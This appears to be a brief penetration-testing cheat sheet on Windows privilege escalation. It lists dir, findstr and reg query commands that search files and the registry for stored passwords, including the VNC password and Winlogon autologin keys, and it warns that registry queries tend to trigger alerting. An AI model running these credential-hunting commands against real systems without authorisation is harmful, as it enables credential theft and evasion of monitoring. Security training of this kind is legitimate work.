manual techniques for privilege escalation

Information Gathering

First step should always be Situational Awareness, understand what's on the host. Please use those commands first to understand what you're against.

Windows Situational Awareness Guide

Common commands

Find passwords/config files

dir/s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.xml *.ini*.txt

/i -incase sensitive ,/s- search subdirectories

reg query HKLM(HKCU) /f password /t REG_SZ /s

Find password in registry

reg query HKLM /f password /t REG_SZ /s > HKLM.txt

reg query HKCU /f password /t REG_SZ /s > HLCU.txt

**Note: **be careful querying the registry as there is usually alerting tied to it

VNC

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"

Windows autologin

reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon"